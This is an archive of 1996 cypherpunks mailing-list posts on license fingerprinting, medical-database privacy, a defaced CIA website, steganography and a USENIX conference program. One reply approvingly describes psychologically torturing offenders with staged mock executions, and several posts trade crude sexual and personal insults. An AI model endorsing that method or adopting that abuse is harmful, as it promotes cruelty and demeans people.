We already have many times more material knowledge than we are morally 
capable of handling as a species.  Here's one tiny example.  The most 
widespread use of the knowledge of psychology is guess what?  Advertising 
and Marketing.  Our average American sits entranced watching hours of 
television daily, unwittingly absorbing countless impressions by 
advertisers with more money than morality.  Can he identify the 
"glittering generalities" or the "bandwagon appeals" or any of the other 
effective forms of propaganda?  Does he know the truth from a 
lie when sexual titillation is part of the presentation?  May he 
readily accept what is presented, and most of all: Does he see himself 
sitting there, absorbing these impressions?

We don't see our selves in action.  We can't know what we're doing.  None 
of us have developed sufficient "presence" to know what we are really doing 
most of the time.  We can't possibly be objective, except in extremely 
rare, life-changing moments, and even then only if we're lucky.

Just thinking about yourself thinking isn't enough, because where are 
your emotions?  Do you really understand why your thoughts are what they 
are?  Did *YOU* put those thoughts in your head intentionally, or did they 
sort of happen on their own... one thought following another through some 
combination of association and external stimuli?  And while you've been 
busy reading this, with your attention directed outward, why haven't 
you been aware of the sensation in your feet, or the tension in your 
face, or your posture, or your breath?

As westerners we have directed so much of our attention "outward" that 
we develop little or no objective knowledge of what goes on within us.  
Can we break this cycle?  If there really are esoteric schools, with 
disciplines and methodologies of obtaining self-knowledge, then this 
knowledge must be such that by its very nature, it cannot possibly be 
communicated successfully in any large, public manner.

But I digress.  As a reader of this list, have you ever asked yourself 
Why, why is it that you personally want strong encryption to be widely 
available?  It's a very powerful emerging technology, and it's in the 
palm of your hands.


Douglas B. Renner
dougr@usa.globelle.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 19 Sep 1996 15:21:52 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199609190531.XAA10513@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


Mike Farrell, actor and longtime opponent of the death penalty:

        "We don't rape rapists,
          we don't burn arsonists,
            why should we kill killers?"

    well, come to thing of it, why don't we let a bull rape a rapist?

    or burn an arsonist at the stake?

    seems fair to me.  maybe even sell tickets to pay for the cost.


--
one of the few things we all share:
  the utter, corrosive contempt for our elected officials.

--
  Politicians are like diapers.
    They both need changing regularly, and for the same reason.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Fri, 20 Sep 1996 01:21:47 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199609191230.FAA09141@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


"Drivers Must Allow Fingerprinting"

By Ralph Ellis   _The Atlanta Constitution_ 9/19/96

"Georgians renewing or getting a new driver's license after Sept. 30 will have to provide the state with two fingerprints.

"The right and left index fingerprints will be taken with an inkless scanning device that is part of a digital imaging system being installed in 82 driver's license examination offices across the state said Gordy Wright, spokesman for the Georgia Department of Public Safety.

SNIP

"The fingerprints will make it difficult for people to obtain licenses with falsified identification papers, Wright said.

"Teresa Nelson of the Ga. Civil Liberties Union said the fingerprinting invades the privacy of law-abiding citizens.

"'I have grave concerns,' she said. 'When we think of giving a fingerprint, we think of being arrested. We feel like we've done something wrong, not because we are complying with the law and are doing something right.'

"There will be no exceptions to the fingerprint requirement..., Wright said, adding that 'having a driver's license is a privilege,' not a right.

SNIP

"Wright said...the fingerprints eventually will be available to other law enforcement agencies and courts....

SNIP

"The new licenses will include an instant photo....A bar code on the back will contain a laser recording of the driver's index fingerprints...." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Thu, 19 Sep 1996 18:12:36 +0800
To: cypherpunks@toad.com
Subject: Counter "noise" with "signal" (please?)
Message-ID: <Pine.3.89.9609190547.B6425-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain


If a S/N ratio becomes irritating, by all means, don't increase the 
denominator!

In other words, do your part to let undeserving threads die.  Certain 
things can only be dignified with a response, but I imagine that goes 
without saying.

-Doug Renner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 19 Sep 1996 16:45:13 +0800
Subject: No Subject
Message-ID: <199609190615.AAA11252@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


        Dimitri; your taste is limitless, your tongue in every sewer.

        must we suffer the depths of your insane depravity?

        should we drop a dime on you?  you're a disgace to humanity.

        must we scan even body text to get rid of you?

        I doubt Tim cares about the lunatic ravings of someone as mad
    as the mad N's "ice weasals," but your childish profaning of humanity
    seems to have no bounds.

        I am flat against censorship, but I think this warrants excluding
    Dimitri from the list. block his posts and block his subscription.
    these personal attacks have nothing to do with your general rights;
    collectively, we are permitted to screen against a banal display of
    ignorance.



On Wed, 18 Sep 1996, Dr.Dimitri Vulis KOTM wrote:


> > Shamster: SHA-enabled biocomputing hamster.

>

> I'm sure Timmy would like to wrap one up in duct tape and shove it

> up his ass...

>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 20 Sep 1996 02:27:27 +0800
To: attila <attila@primenet.com>
Subject: Re: Mike Farrell, actor
In-Reply-To: <199609190531.XAA10513@InfoWest.COM>
Message-ID: <3241542F.4E70@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila wrote:
> Mike Farrell, actor and longtime opponent of the death penalty:
>         "We don't rape rapists,
>           we don't burn arsonists,
>             why should we kill killers?"
>     well, come to thing of it, why don't we let a bull rape a rapist?
>     or burn an arsonist at the stake?
>     seems fair to me.  maybe even sell tickets to pay for the cost.

This must be just the entertainment angle. Something about ancient Roman 
orgies comes to mind. More to the point, if you can't figure out how to 
reform the offender (impossible in current prisons), and you can't get 
the offender to compensate the victim(s), you could at least tap into 
the perp's subconscious a little way and apply some inhibitors.

One technique that works on a lot of violence-prone individuals:

Chain the bad guy to a secure post in a dark basement somewhere, and 
leave them for 24 hours. On returning, flip on the light, give them a 
few seconds to be able to at least see your outline pretty well, then 
put an empty revolver next to their head and fire. Now turn off the 
light and leave. Repeat until subject is jelly, basically. Variations 
include various background noises with timing controller, etc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hootie@netrix.net
Date: Fri, 20 Sep 1996 01:12:07 +0800
To: Batman <gnu@toad.com>
Subject: RE: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building
Message-ID: <9609191315.AA19307@netrix.net>
MIME-Version: 1.0
Content-Type: text/plain


Me too!

At 09:24 AM 9/19/96 +-200, Batman wrote:
>For the 200th time, unsubscrive me of your fucked mail lists.
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Thu, 19 Sep 1996 16:05:30 +0800
To: cypherpunks@toad.com
Subject: The periodic caveat about Timmy May
Message-ID: <199609190517.HAA00851@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May habitually digs into his cesspool of a mind for his
mailing list fertilizer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Thu, 19 Sep 1996 16:15:51 +0800
To: cypherpunks@toad.com
Subject: Re: GAK, GAP, GAY
In-Reply-To: <ae657f56110210042afc@[207.167.93.63]>
Message-ID: <Pine.HPP.3.91.960919051258.16973C-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996, Timothy C. May wrote:

> On a related note, I read an article yesterday about the proposed new
> Health Data Base, with all encounters with any medical institution or any
> health care provider of any sort being cross-linked and cross-referenced.

Scary. The benefits for the singular patient would be very marginal.
Epidemiologic research would become easier, with lots of opportunities
for the publish-or-perish academic medical crowd, but we already
know that smoking etc is bad for us. The real agenda is of course
to make life easier for the insurance business, our would-be employers
and the State.

> the master index was born....Only people with a 'security ticket'--such as
> doctors, insurers, scientific researchers or police with a proper
> warrant--are supposed to be able to see the clinical details....Kathy Ganz,
> director of the New Mexico Health Policy Commission, said, "Rights to
> privacy are genuine concerns, but they will need to be balanced against
> notions of common good."

The specialized software industry is currently flooding the medical
community with applications for all sorts of patient-related info.
It started with the small units (offices, with a single or a handful
doctors etc), which are already doing a lot of their record-keeping
on digital media, often with lousy security. Now the turn has come to
the big hospitals, which need heavily customized implementations of
the basic product they will choose. Athough most serious products
have proper authentication routines (including smartcards; especially
nurses seem to be totally unable to handle passwords above the
my_cat's_name level), the overall availability of patient data will
rise enormously with digital storage. The trend in the US is for
large companies to take over more and more of the big hospitals
(in Sweden almost all hospitals are owned by the 'public', with
a trend towards bigger and bigger integrated 'regions') mandating
larger and larger databases. So even without an outspoken decision
the Grand National Health Database is worming itself upon us.

> Pretty chilling, eh? As we all know, once such medical, dietary, and
> genetic data bases are established, the likelihood of privacy-invading
> use is near unity.

It certainly is. And cryptography can not do that much about it since
it's primarily a problem of user integrity.


Asgaard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Thu, 19 Sep 1996 17:02:49 +0800
To: cypherpunks@toad.com
Subject: Re: GAK, GAP, GAY
In-Reply-To: <199609190117.SAA04924@netcom21.netcom.com>
Message-ID: <Pine.HPP.3.91.960919072143.16973D@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996, Vladimir Z. Nuri wrote:

> of blinding and zero-knowledge protocols applied to health databases.
> it seems reasonable that this can be worked out.

De-identified records are common in medical research, where applicable.
The problem is that for effective epidemiological research the
self-generated ID you propose must be applied in a lot of databases
outside of health care. The epidemiologist wants to know when you
were born, when you give birth or die or buy liquor, your income,
standard of living, grade of radon contamination in your house,
what Web-pages you access etc etc. (The Swedish Post is currently
spending a lot of money advertising their new Web services. For
full access to such sensitive data as detailed wheather maps you 
have to enter your name, address and Person Number - for credit
information, they say - and they will send you, by snail mail, a
username and password; http://www.torget.se)

So in the end you haven't really gained much by creating your own
ID - it will be just as useful to the State as if they had
given it to you.


Asgaard
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 20 Sep 1996 03:09:27 +0800
To: cypherpunks@toad.com
Subject: Re: CIA hacked
In-Reply-To: <Pine.GSO.3.95.960919130705.28208H-100000@admin.is.co.za>
Message-ID: <5w5HuD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike van der Merwe <mikev@is.co.za> writes:
> I'm sure we will find out in a few years that Microsoft invented the
> Net.  Or brought it to the masses.  Or saved it from a certain and
> early demise.  Or all of the above.
>      JAMES SEYMOUR

Dr. John M. Grubor created the 'net.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@issl.atl.hp.com>
Date: Fri, 20 Sep 1996 00:34:31 +0800
To: cypherpunks@toad.com (Cypherpunks List)
Subject: DL in exchange for fingerprint
Message-ID: <199609191223.IAA13606@jafar.issl.atl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh joy.  You no longer need to be arrested to get fingerprinted
in Georgia.  On the front page of Wednesday's Atlanta Journal, under
the headline "Now you can get driver's license in minutes":

    The average 45-day wait to get a new driver's license in Georgia
    will be a thing of the past under a new system that will churn
    them out while customers wait.

    "From start to finish it takes about 10 minutes," said chief
    examiner ... in charge of the Georgia State Patrol's driver's
    license office in Milledgeville where the system went into effect
    on Tuesday.

    Previously, drivers received a temporary paper license that was
    good for 45 days. ...

    ...

    Officials at the Department of Public Safety plan to have the new
    computer system in 82 locations across the state by Oct. 1.  Georgia
    is the 32nd state with the system.

    After an eye exam, the applicant presses a finger down on a pad
    that registers the fingerprint in a state-wide memory bank.  Then,
    the examiner confirms the name, address, and identifying information.

    ...

    The licenses have a hologram of the word "Georgia" behind the
    driver's name, age and address, and a bar code on the back that
    contains a laser recording of the driver's index fingerprints.

    "We keep a memory bank that matches your fingerprints with your
    license," [DoPS spokesman] said.  "In other words, if you went to
    get a new license with a false birth certificate and your
    fingerprint didn't match the name, you wouldn't get a license.
    And you could also face possible investigation for fraud from the
    Public Safety's investigative division."

    ...

    "I think it's wonderful," said Katherine Kidd, the first
    Milledgeville driver to get the instant license.  "It's a great
    idea.  Now we don't have to wait forever."

    [ End quote ]

Just what I would have called it: a great idea.  Is it true that 31
other states take your fingerprint as part of the license application?
I feel sick.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 20 Sep 1996 05:02:44 +0800
To: cypherpunks@toad.com
Subject: Re: DL in exchange for fingerprint
Message-ID: <ae66bb9816021004790c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:23 PM 9/19/96, Jeff Barber wrote:
>Oh joy.  You no longer need to be arrested to get fingerprinted
>in Georgia.  On the front page of Wednesday's Atlanta Journal, under
>the headline "Now you can get driver's license in minutes":
...
>Just what I would have called it: a great idea.  Is it true that 31
>other states take your fingerprint as part of the license application?
>I feel sick.

California has it, so that's what about 20 million drivers have to put up
with. I'd expect all the states to have this within a few years.

(Yes, I disliked being thumb-printed, but I could see no viable
alternative. I'm sure Duncan has some scheme to declare himself a Botswanan
exchange student, but I decided being thumb-printed was the lesser hassle.)

By the way, the next rev of the California driver's license will reportedly
have one's *Social Security Number* printed on the card! So much for the
statement clearly printed on my card:

"For social security and tax purposes -- not for identification."

Paraphrasing that famous quote, just which part of "not for identification"
don't they understand?

(Indeed, I am asked for my SSN in many places. A few times I've refused to
give it. Once the clerk just said, "Fine, I have it here on my computer
anyway." Refusing to give it is probably no longer meaningful, due to
massively cross-linked data bases.)

Again, we desperately need an infrastructure of "credentials without identity."

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Fri, 20 Sep 1996 04:12:47 +0800
To: cypherpunks@toad.com
Subject: Re: CIA web site hacked
Message-ID: <199609191557.IAA06913@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Chain: 2

Mike van der Merwe writes:
>
>
> Hi everybody
>
> Heh! This one's good for a laugh :-))
>
> http://www.odci.gov/cia
>
> Seems the DOJ hack was a good inspiration. Heh! Life's good when you're
> willing to work at it.



www.odci.gov appears to have been shut down (as of 11:50am EDT).

Did anyone make a copy of the hacked pages?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Thu, 19 Sep 1996 17:18:44 +0800
To: cypherpunks@toad.com
Subject: Re: WinSock Remailer Version ALPHA 1.3 Now Available
Message-ID: <9609190709.AA20094@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Thu Sep 19 09:07:16 1996
Has it already been exported by some sinister anonymous? If so, where?

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMkDxJRFhy5sz+bTpAQGnGAf9GgDkjFpjbHewBBAQlGBiZvVeRM+Co8zx
sP8eQN3FJbvwVQdIblxy3Tc4k0/q4+8KA/GCYpEsN4h9+71CgPWHeMGla0egKf4L
eGcYGlBKNPA+EmJnX7YETqMAFOblejgxgxWwnPOZLMiOqiBhTGpqIq1xEJugXm6v
m85qDTSomlhygKnexWVv9jVM6ntyx2x0WBCwR/L+B9NrFcoBv5GTCpiXOoEzOXq2
PhPmxxdD1Q2NF9/FSLGTOJPy9BgIyO7L3MzmKeC5ps3jlmN2Q4U+Icdchd4nnB/a
IAzyBWqNCnxmglbdhhq2JoU1HLi+6DsuhaOoE3T5VDar+gPcVD/Apg==
=0Iof
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Fri, 20 Sep 1996 01:29:59 +0800
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Stego inside encryption
Message-ID: <n1368997697.79775@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


I know a lot of times the idea behind steganography is to hide the fact that a
secret message is in a seemingly normal file/mail/whatever.  This is good
for avoiding unwanted interest in your file.  The benefit of not having people
attempt to crack you code, added to the strength of the cryptosystem is
wonderful.  However, I propose this--

Don't hide that anything's encrypted!  Rather than hide this fact, throw it
in their face!  I propose hiding an encrypted message inside another 
encrypted message.  Set bits in specific places to data in the real message.
The benefit is Oscar not only doesn't know what the crypto is, he attacks
the wrong message.  Hiding statistically random bits from the true message
in statistically random bits from the masking message shouldn't be too 
hard.

Granted, this scheme doesn't get you past measures designed to keep out all
encrypted messages, and it surely wouldn't keep you message from generating
interest, but it would be very hard to decrypt the message, especially when 
some algorithm is used which (seemingly) randomly selects which bits to use 
for the stego.

Just a thought...  My apologies if someone has already proposed this method.

Patrick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 20 Sep 1996 02:46:35 +0800
To: cypherpunks@toad.com
Subject: 1997 USENIX Technical Conference info
Message-ID: <199609191319.JAA12275@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


USENIX 1997 ANNUAL TECHNICAL CONFERENCE
January 6-10, 1997, Anaheim, California


Co-Located with:
USELINUX:  Linux Applications Development & Deployment Conference
Co-Sponsored by Linux International and the USENIX Association

PROGRAM AT A GLANCE AND IMPORTANT DATES TO REMEMBER

=====================================================
Early Registration Savings Deadline: November 22, 1996
Hotel Discount Deadline: December 20, 1996
=====================================================

	SUNDAY, JANUARY 5
Registration		4:00pm - 9:00pm
Kickoff Reception	6:00pm - 9:00pm

	MONDAY, JANUARY 6
Registration	7:30am - 5:00pm
Tutorials	9:00am - 5:00pm

	TUESDAY, JANUARY 7
Registration	7:30am - 5:00pm
Tutorials	9:00am - 5:00pm
Birds-of-a-Feather Sessions	6:00pm - 10:00pm

	WEDNESDAY, JANUARY 8
Registration		7:30am - 6:00pm
Keynote Address		9:00am - 10:30am
Technical Sessions	11:00am - 5:00pm
USELINUX Developers 	9:00am - 5:30pm
Vendor Display		12:00am - 7:00pm
USELINUX Case Studies	7:30pm - 11:00pm
Birds-of-a-Feather Sessions	7:30pm - 11:00pm

	THURSDAY, JANUARY 9
Registration		7:30am - 6:00pm
Technical Sessions	9:00am - 6:00pm
USELINUX Developers	9:00am - 5:30pm
Vendor Display		10:00am - 4:00pm
Birds-of-a-Feather Sessions	6:00pm - 10:00pm
USELINUX Case Studies	6:00pm - 10:00pm

	FRIDAY, JANUARY 10
Technical Sessions	9:00am - 5:45pm
USELINUX Business	9:00am - 4:00pm


NEW AT ANAHEIM:
===============
USELINUX, the Linux Applications Development and Deployment
Conference, co-sponsored by Linux International and USENIX.

If you are:
An application developer porting or developing Linux applications,
a system admininistrator having to maintain Linux systems,
a business person who wishes to develop a Linux business,
plan to attend USELINUX.  One fee covers the registration for both
conference programs, and you can go freely back and forth between
them. (Tutorials carry a separate fee for both USENIX and USELINUX).

=================================
TUTORIAL PROGRAM 	
Monday-Tuesday, January 6-7, 1997
=================================

Register now to guarantee your first choice - seating is limited.

Tutorial fees include printed and bound tutorial materials from 
your sessions, lunch, CD-ROM with Tutorials, Referreed Papers, and 
Invited Talks, Admission to the Vendor Exhibits


TUTORIAL OVERVIEW

Monday, January 6
=================
M1:  Beginning Perl Programming for UNIX Programmers (Updated for 
     Perl 5)
M2:  The Kerberos Approach to Network Security (Updated). 
M3:  An Introduction to Java
M4:  Secure Java Programming
M5:  Windows NT and Windows 95 - The Win32 API
M6:  UNIX Network Programming
M7:  Selected Topics in System Administration (New)
M8:  How Networks Work - The Limits of Modern Internetworking (Updated)
M9:  System and Network Performance Tuning (New)
M10:  Inside the Linux 2.0 Kernel (New)

Tuesday, January 7
=================
T1:  UNIX Security Tools: Use and Comparison.
T2:  CGI and WWW Programming in Perl (New)
T3:  Security on the World Wide Web (New)
T4:  Creating Effective User Interfaces (New)
T5:  Java Applets and the AWT (New)
T6:  Setting Up And Administering A Web Server (New)
T7:  Security for Software Developers: How to Write Code that
     Withstands Hostile Environments (New)
T8:  Solaris System Administration (New)
T9:  IP version 6: An Introduction
T10:  Writing Device Drivers Under Linux (New)

COMPLETE TUTORIAL DISCRIPTIONS
Are available on our Website, http://www.usenix.org

====================================
TECHNICAL PROGRAM	
Wednesday-Friday, January 8-10, 1997
====================================

TECHNICAL SESSIONS

WEDNESDAY, JANUARY 8
9:00-10:30

Opening Remarks: John Kohl, Pure Atria Corporation

Keynote Address: Developing on "Internet Time"
James Gosling, Sun Microsystems

REFEREED PAPERS

11:00-12:30:  PERFORMANCE I

Embedded Inodes and Explicit Grouping: Exploiting Disk Bandwidth for
Small Files
  Gregory R. Ganger and M. Frans Kaashoek, Massachusetts Institute of
  Technology

Observing the Effects of Multi-Zone Disks
  Rodney Van Meter, Information Sciences Institute, University of
  Southern California

A Revisitation of Kernel Synchronization Schemes
  Christopher Small and Stephen Manley, Harvard University

2:00-3:30:  INTERFACE TRICKS

Porting UNIX to Windows NT
  David G. Korn, AT&T Research

Protected Shared Libraries - A New Approach to Modularity and
Sharing
  Arindam Banerji, John M. Tracey, and David L. Cohn, University of
  Notre Dame

A Novel Way of Extending the Operating System at the User-Level: the
Ufo Global File System
  Albert D. Alexandrov, Maximilian Ibel, Klaus E. Schauser, and Chris
  J. Scheiman, University of California, Santa Barbara

4:00-5:00:  CLIENT TRICKS

Network-aware Mobile Programs
  Mudumbai Ranganathan, Anurag Acharya, Shamik Sharma, and Joel Saltz,
  University of Maryland

Using Smart Clients to Build Scalable Services
  Chad Yoshikawa, Brent Chun, Paul Eastham, Amin Vahdat, Thomas
  Anderson, and David Culler, University of California, Berkeley

THURSDAY, JANUARY 9

9:00-10:30:  CLUSTERING

Building Distributed Process Management on an Object-Oriented
Framework
  Ken Shirriff, Sun Microsystems Laboratories

Adaptive and Reliable Parallel Computing on Networks of Workstations
  Robert D. Blumofe, University of Texas, Austin and Philip A.
  Lisiecki, Massachusetts Institute of Technology

A Distributed Shared Memory Facility for FreeBSD
  Pedro A. Souto and Eugene W. Stark, State University of New York,
  Stony Brook

11:00-12:30:  TOOLS

Libcdt: A General and Efficient Container Data Type Library
  Kiem-Phong Vo, AT&T Research

A Simple and Extensible Graphical Debugger
  David R. Hanson and Jeffrey L. Korn, Princeton University

Cget, Cput, and Stage  Safe File Transport Tools for the Internet
  Bill Cheswick, Bell Laboratories

2:00-3:30:  WORKS IN PROGRESS


FRIDAY, JANUARY 10

9:00-10:30:  USER SOMETHING

WebGlimpse - Combining browsing and searching
  Udi Manber, Michael Smith, and Burra Gopal, University of Arizona

Mailing List Archive Tools
  Sam Leffler and Melange Tortuba, Silicon Graphics

Experience with GroupLens: Making Usenet Useful Again
  Bradley N. Miller, John T. Riedl, and Joseph A. Konstan, University
  of Minnesota

11:00-12:30:  PERFORMANCE II

Overcoming Workstation Scheduling Problems in a Real-Time Audio Tool
  Isidor Kouvelas and Vicky Hardman, University College London

On Designing Lightweight Threads for Substrate Software
  Matthew Haines, University of Wyoming

High-Performance Local-Area Communication With Fast Sockets
  Steven H. Rodrigues, Thomas E. Anderson, and David E. Culler,
  University of California, Berkeley

2:00-3:30:  CACHING and STASHING

An Analytical Approach to File Prefetching
  Hui Lei and Dan Duchamp, Columbia University

Optimistic Deltas for WWW Latency Reduction
  Gaurav Banga, Fred Douglis, and Michael Rabinovich, AT&T Research

A Toolkit Approach to Partially Connected Operation
  Dan Duchamp, Columbia University


4:15-5:45:  JOINT CLOSING SESSION
Severe Tire Damage's Stupid Mbone Tricks - A Lecture/Demonstration


INVITED TALKS
=============
WEDNESDAY, JANUARY 8

11:00-12:30:  Nomadicity and the IETF
  Charles E. Perkins, IBM T.J. Watson Research Center

2:00-3:30:  If Cryptography Is So Great, Why Isnt It Used More?
  Matt Blaze, AT&T Research

4:00-5:00:  The Inktomi Web Search Engine
  Eric Brewer, University of California, Berkeley

THURSDAY, JANUARY 9

9:00-10:30:  The AltaVista Web Search Engine
  Louis Monier, Digital Equipment Corporation

11:00-12:30:  IPv6: The New Version of the Internet Protocol
  Steve Deering, Xerox Palo Alto Research Center

2:00-3:30:  Highlights from 1996 USENIX Conferences and Workshops

4:00-5:30:  Inferno
   Rob Pike, Bell Labs

FRIDAY, JANUARY 10

9:00-10:30:  Measuring Computer Systems: How to Tell the Truth with 
             Numbers
  Margo Seltzer and Aaron Brown, Harvard University

11:00-12:30:  Stupid Net Tricks
  Bill Cheswick, Bell Laboratories

2:00-3:30:  Finding Bugs in Concurrent Programs
  Gerard J. Holzmann, Bell Laboratories


USELINUX PROGRAM
=================

USELINUX DEVELOPERS

WEDNESDAY, JANUARY 8

9:00-10:30:   Linux: What It Is and Why It Is Significant
  Mark Bolzern, Work Group Solutions
  Tom Miller, X Engineering Software Systems

11:00-12:30:   The Sparc Port of Linux
  David S. Miller, Rutgers CAIP
  Miguel de Icaza, Instituto de Ciencias Nucleares, Ciudad
  Universitaria, Universidad Nacional Autonoma de Mexico

2:00-3:30:  Advanced Device Drivers
  Alessandro Rubini, Universita di Pavia

4:00-5:00:  Future of the Linux Kernel
  Linus Torvalds, Helsinki University


THURSDAY, JANUARY 9

9:00-10:30:  Real Time
  Victor Yodaiken and Michael Barabanov, New Mexico Institute of
  Technology

11:00-12:30:  /proc
  Stephen Tweedie, Digital Equipment Corporation

11:00-12:30:  The Pluggable Authentication Modules (PAM) Framework
  Ted Tso, Massachusetts Institute of Technology

2:00-3:30:  Standards
  Heiko Eissfeldt, Unifix Software

4:00-5:30:  Connecting Legacy and Open Systems
  Michael Callahan, Stelias Computing, Inc.


USELINUX BUSINESS
=================
FRIDAY, JANUARY 10

9:00-9:30:  Linux: What It Is and Why It Is Significant
  Mark Bolzern, Work Group Solutions
  Tom Miller, X Engineering Software Systems

9:30-10:30:  Linux and Distribution Channels: Ways to Enter the 
             Commercial Market
  Dan Rosenberg, Stromian Technologies

11:00-12:30:  Using Linux in Your Business: A Business Justification
  Presented by Linux International

2:00-4:00:  The Linux Market: Who, What, Where, When and Why?
  Presented by Linux International


USELINUX PRESENTATIONS AND CASE STUDIES DESCRIPTIONS
====================================================

WEDNESDAY, JANUARY 8, 7:30pm - 11:00pm

The Use of Linux for Dedicated Systems
  Chel van Gennip, HISCOM BV

Perceptions: A Strategic Deployment of Linux in the Health Care
Environment
  Greg Wettstein, Velocity LLC

The Future of the Linux Desktop
  Ken Apa, Governors State University; Jim Fetters, Chicago 
  Mercantile Exchange; Joe Sloan, Toyota Motor Sales USA

The Classroom of the Future
  Karl Jeacle, Broadcom Eireann Research Ltd.

THURSDAY, JANUARY 9,	6:00pm - 10:30pm

Using GNUstep to Deploy User Applications
  Scott Christley, NET-Community

Embedded, Turnkey and Real Time
  Phil Hughes, Linux Journal

Developing Linux-based Electronic Markets for Internet Trading
Experiments
  Paul J. Brewer, Georgia State University


VENDOR EXHIBITION
=================
Wednesday, January 8,   Noon - 7:00pm
Thursday, January 9   10:00am - 4:00pm

If you cannot make it to the conference but would like to visit the
exhibition, please contact Cynthia Deno, Exhibit Coordinator, at
408-335-9445 or cynthia@usenix.org.

Vendors:
========
The USENIX 97 Exhibition offers:

"Two days of exposure to the cream of the UNIX User Community."
-Neil Groundwater, Enterprise Management Group, SunSoft, Inc.

Please contact:

Cynthia Deno, Exhibit Co-ordinator
Tel: 408-335-9445
Fax: 408-335-5327
cynthia@usenix.org


GENERAL CONFERENCE INFORMATION

Birds-of-a-Feather Sessions (BoFs)
==================================
Tuesday, Wednesday, and Thursday evenings

Do you have a topic that youd like to discuss with others?
Birds-of-a-Feather sessions may be perfect for you. BoFs are
interactive, informal gatherings for attendees interested in a
particular topic. Schedule your BoF in advance. Call the Conference
Office at 714.588.8649 or send email to conference@usenix.org.
Topics are announced at the conference. BoFs may also be scheduled
on-site.

The Guru is IN
==============
Have a question thats been bothering you? Try asking a USENIX guru!
Noted experts from the USENIX community will be available to spark
controversy and answer questions. Please contact the Invited Talks
Coordinators via email to ITusenix@usenix.org if you would like to
volunteer your expertise.

Works-in-Progress Reports
=========================
Short, pithy, and fun, Works-in-Progress Reports (WIPs) introduce
interesting new or ongoing work. If you have work to share or a cool
idea not quite ready to be published, a WIP Report is for you! You
will receive insightful feedback. We are particularly interested in
presenting student work. WIPs are scheduled within the technical
sessions program. To reserve a slot, send email to wips@usenix.org.
Topics are announced on-site.

CONFERENCE SERVICES

Terminal Room
=============
Internet and dial-out access are provided in the Terminal Room.
The Terminal Room will be open throughout the conference week. 
Look for details posted to comp.org.usenix.

Attendee Message Service
========================
Electronic message service will be available Monday, January 6
through Friday, January 10. Electronic messages to conference
attendees should be addressed: first_lastname@conference.usenix.org.


HOTEL AND TRAVEL INFORMATION:
============================
Hotel Discount Reservation Deadline:
Friday, December 20, 1996

USENIX has negotiated special rates for conference attendees at 
the Anaheim Marriott. Contact the hotel directly to make your
